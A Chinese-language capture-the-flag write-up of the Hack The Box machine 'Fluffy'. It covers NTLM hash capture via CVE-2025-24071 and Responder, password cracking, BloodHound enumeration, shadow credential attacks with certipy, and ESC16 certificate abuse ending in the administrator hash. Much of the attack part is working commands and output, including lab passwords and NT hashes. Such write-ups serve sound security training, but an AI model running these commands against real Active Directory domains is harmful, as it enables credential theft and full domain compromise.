1. 信息搜集
2. smb
3. CVE-2025-24071
4. 域内信息搜集
5. shadow credential攻击
6. ESC16

信息搜集

┌──(root㉿kali)-[~/Desktop/tmp]
└─# rustscan -a 10.10.11.69 -- -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3268
Open 10.10.11.69:3269
Open 10.10.11.69:5985
Open 10.10.11.69:9389
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV" on ip 10.10.11.69
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 11:37 EDT
NSE: Loaded 47 scripts for scanning.
Initiating Ping Scan at 11:37
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 11:38, 2.83s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:38
Completed Parallel DNS resolution of 1 host. at 11:38, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:38
Scanning 10.10.11.69 [12 ports]
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Completed SYN Stealth Scan at 11:38, 0.36s elapsed (12 total ports)
Initiating Service scan at 11:38
Scanning 12 services on 10.10.11.69
Completed Service scan at 11:38, 48.89s elapsed (12 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:38
Completed NSE at 11:38, 0.87s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:38
Completed NSE at 11:38, 1.09s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.74s latency).
Scanned at 2025-06-04 11:38:01 EDT for 51s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-04 22:16:38Z)
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o: microsoft: windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.35 seconds
           Raw packets sent: 20 (832B) | Rcvd: 19 (868B)

smb

给了账号和密码

1	j.fleischman / J0elTHEM4n1990!

可以尝试 smb 服务，用 smbmap 跑一下

[+] IP: 10.10.11.69:445 Name: bogon                     Status: Authenticated
Disk                                                    Permissions     Comment
----                                                    -----------     -------
ADMIN$                                                  NO ACCESS       Remote Admin
C$                                                      NO ACCESS       Default share
IPC$                                                    READ ONLY       Remote IPC
IT                                                      READ, WRITE
NETLOGON                                                READ ONLY       Logon server share
SYSVOL                                                  READ ONLY       Logon server share

可以发现 IT 事由可读可写的权限的，连接上去

┌──(root㉿kali)-[~/Desktop/tmp]
└─# smbclient  //10.10.11.69/IT -U 'j.fleischman'
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  4 18:20:46 2025
  ..                                  D        0  Wed Jun  4 18:20:46 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1362088 blocks available

发现有一个 pdf 文件，下载下来

CVE-2025-24071

给了一些 cve 编号，去查看一下，通过查询发现 CVE-2025-24071，结合 IT 文件夹下面的所有 zip 文件全部解压了，就可以猜测他是上传压缩包然后就会解压。先生成恶意的文件，然后监听一下

1 2	┌──(root㉿kali)-[~/Desktop/tmp] └─# responder -I tun0 -wvF

再上传恶意的文件，然后稍等一会就可以得到 hash

┌──(root㉿kali)-[~/Desktop/tmp]
└─#  responder -I tun0 -wvF
__
.----.-----.-----.-----.-----.-----.--|  |.-----.----.
|   _|  -_ _|_ _ --|  _  |  _  |     |  _  ||  -__|   _|
|__| |__ ___|___ __|   __|____ _|_ _|_ _|_ ____||____ _|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.5.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal  -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR                      [ON]
NBT-NS                     [ON]
MDNS                       [ON]
DNS                        [ON]
DHCP                       [OFF]

[+] Servers:
HTTP server                [ON]
HTTPS server               [ON]
WPAD proxy                 [ON]
Auth proxy                 [OFF]
SMB server                 [ON]
Kerberos server            [ON]
SQL server                 [ON]
FTP server                 [ON]
IMAP server                [ON]
POP3 server                [ON]
SMTP server                [ON]
DNS server                 [ON]
LDAP server                [ON]
MQTT server                [ON]
RDP server                 [ON]
DCE-RPC server             [ON]
WinRM server               [ON]
SNMP server                [OFF]

[+] HTTP Options:
Always serving EXE         [OFF]
Serving EXE                [OFF]
Serving HTML               [OFF]
Upstream Proxy             [OFF]

[+] Poisoning Options:
Analyze Mode               [OFF]
Force WPAD auth            [ON]
Force Basic Auth           [OFF]
Force LM downgrade         [OFF]
Force ESS downgrade        [OFF]

[+] Generic Options:
Responder NIC              [tun0]
Responder IP               [10.10.16.86]
Responder IPv6             [dead: beef: 4:: 1054]
Challenge set              [random]
Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD  ['_DOSVC']
TTL for poisoned response  [default]

[+] Current Session Variables:
Responder Machine Name     [WIN-YEKAC9P279V]
Responder Domain Name      [S41C.LOCAL]
Responder DCE-RPC Port     [48375]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: 15a7f5671d8f23b8: EDF3440AF606B6C15B6C694B0747BC9E: 0101000000000000001CB51A48D5DB0190A62D994A6A95210000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: 856c2146dfc1f95c: 6218981EF00A027D84BD5E7F02DB6EAC: 0101000000000000001CB51A48D5DB01309C01BC04848CF90000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: b02f2a9cafa7b984:8D874813F31693CF5B45A2643E7436B1:0101000000000000001CB51A48D5DB01BCBF64251C0031500000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: 7545fe61b09b6921: CC56B59E46A59F59849CAE40134D5938:0101000000000000001CB51A48D5DB012EFB60CED2ECD0B40000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: 30fe9a80b4fa471a: FC773A6D1408B43D56EF70D713FA5A3C: 0101000000000000001CB51A48D5DB010AA08F0CE9033CA00000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila:: FLUFFY: fede96ac801d08d7:3A2EBD07530F59B20226FED61156AD92:0101000000000000001CB51A48D5DB01EB38F0C5AB99A22E0000000002000800530034003100430001001E00570049004E002D00590045004B004100430039005000320037003900560004003400570049004E002D00590045004B00410043003900500032003700390056002E0053003400310043002E004C004F00430041004C000300140053003400310043002E004C004F00430041004C000500140053003400310043002E004C004F00430041004C0007000800001CB51A48D5DB0106000400020000000800300030000000000000000100000000200000DB4DF07F1AE72AC761DCA57865BA88AF46E10FF5B134D6C9EE01DDA8F2E163C60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000

这个哈希可以用 john 爆破出来

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john pass -w =/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)
1g 0:00:00:02 DONE (2025-06-04 12:02) 0.3412g/s 1541Kp/s 1541Kc/s 1541KC/s proquis..programmercomputer
Use the "--show --format = netntlmv2" options to display all of the cracked passwords reliably
Session completed.

然后用这个域内的账号进行一些域内信息搜集

┌──(root㉿kali)-[~/Desktop/tmp]
└─# crackmapexec smb 10.10.11.69 -u 'p.agila' -p 'prometheusx-303'
SMB         10.10.11.69     445    DC01             [*] Windows 10.0 Build 17763 (name: DC01) (domain: fluffy.htb) (signing: True) (SMBv1: False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\p.agila: prometheusx-303

域内信息搜集

用 bloodhound 进行信息搜集，域控的域名为 DC01.fluffy.htb

┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -ns 10.10.11.69 -c All --zip
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 35S
INFO: Compressing output into 20250604122752_bloodhound.zip

看红色的这条线

1 2	GenericAll ：拥有一个可以完全控制用户/组的权限 GenericWrite ：此权限能够更新目标对象的属性值

shadow credential攻击

p.agila 是一个 service manager 组。这个用户可以将自己加入 Service Account 用户组，然后对 svc 用户拥有 GenericWrite 权限，这个权限结合 CA 证书服务，可以导致影子证书攻击。

影子证书攻击利用条件

1
2
3

至少一台 Windows Server 2016 域控制器。 
域功能级别为 win server 2016 或者更高。 （域控版本是 Windows Server 2019 Standard）
开启 AD CS 或者 CA。

只要能改变某个账号的 msDS-KeyCredentialLink 属性，且满足上面三个条件，我们就能获得这个账号的 TGT 和 ntlm hash。对 svc 账号是具有 GenericWrite 的权限的。

先将用户添加进 Sevice Account 组里

1 2	┌──(root㉿kali)-[~/Desktop/tmp] └─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 get writable

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303'  -account 'WINRM_SVC'  -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '176ea786-94c4-9724-c344-5ea70d5c8689'
[*] Adding Key Credential with device ID '176ea786-94c4-9724-c344-5ea70d5c8689' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '176ea786-94c4-9724-c344-5ea70d5c8689' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

拿到了 hash (如果抓不到的话，尝试对一下时区)

┌──(root㉿kali)-[~/Desktop/tmp]
└─# evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents >

同样，通过影子证书可以拿到 CASVC 的 hash

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303'  -account 'CA_SVC'  -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '016d8ca3-d941-fd7b-bd40-2960883be18a'
[*] Adding Key Credential with device ID '016d8ca3-d941-fd7b-bd40-2960883be18a' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '016d8ca3-d941-fd7b-bd40-2960883be18a' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

ESC16

查看证书是否有模板漏洞

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad find -username ca_svc -hashes : ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA

[!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'fluffy-DC01-CA'
[*] Saved BloodHound data to '20250604125906_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250604125906_Certipy.txt'
[*] Saved JSON output to '20250604125906_Certipy.json'

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 20250604125906_Certipy.txt
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN = fluffy-DC01-CA, DC = fluffy, DC = htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
Certificate Templates                   : [!] Could not find any certificate templates

更新一下 certipy

1	pip install -U certipy-ad

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 20250604131307_Certipy.txt
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN = fluffy-DC01-CA, DC = fluffy, DC = htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates

存在 ESC16

# ESC16 攻击
certipy-ad account -u 'ca_svc' -hashes : ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update

certipy-ad account -u 'ca_svc' -hashes : ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.249.10 -user 'ca_svc' read

certipy-ad req -dc-ip '10.129.249.10' -u 'administrator' -hashes : ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

certipy-ad account -u 'ca_svc' -hashes : ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -upn 'winrm_svc' -user 'ca_svc' update

certipy-ad auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.249.10

1	[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

HTB-Fluffy

信息搜集

smb

CVE-2025-24071

域内信息搜集

shadow credential攻击

ESC16